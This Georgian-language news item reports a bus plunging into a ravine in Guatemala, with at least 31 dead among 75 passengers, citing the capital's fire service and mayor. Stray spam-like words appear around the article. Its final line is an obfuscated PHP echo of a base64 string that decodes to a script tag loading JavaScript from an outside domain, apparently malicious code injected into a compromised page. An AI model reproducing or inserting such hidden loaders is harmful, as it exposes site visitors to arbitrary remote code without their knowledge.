tube
ავერსი jaluzi

 გვატემალაში, ავტობუსის ხევში გადავარდნის შედეგად, სულ მცირე 31 ადამიანი დაიღუპა, - ამის შესახებ ინფორმაციას „ფრანს-პრესი“ გვატემალის დედაქალაქის სახანძრო სამსახურზე დაყრდნობით ავრცელებს.

„ამ დროისთვის, 31 ცხედარია ამოყვანილი და ვცდილობთ ჩარჩენილი ადამიანები გადავარჩინოთ“, - განაცხადა გვატემალის დედაქალაქის სახანძრო სამსახურის სპიკერმა, მეინორ რუანომ.

გავრცელებული ინფორმაციით, ავტობუსში 75 ადამიანი იმყოფებოდა.

გვატემალის დედაქალაქის მერის, რიკარდო კინიონესის განცხადებით, შემთხვევის ადგილზე სამაშველო სამსახურები მუშაობენ.

81
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");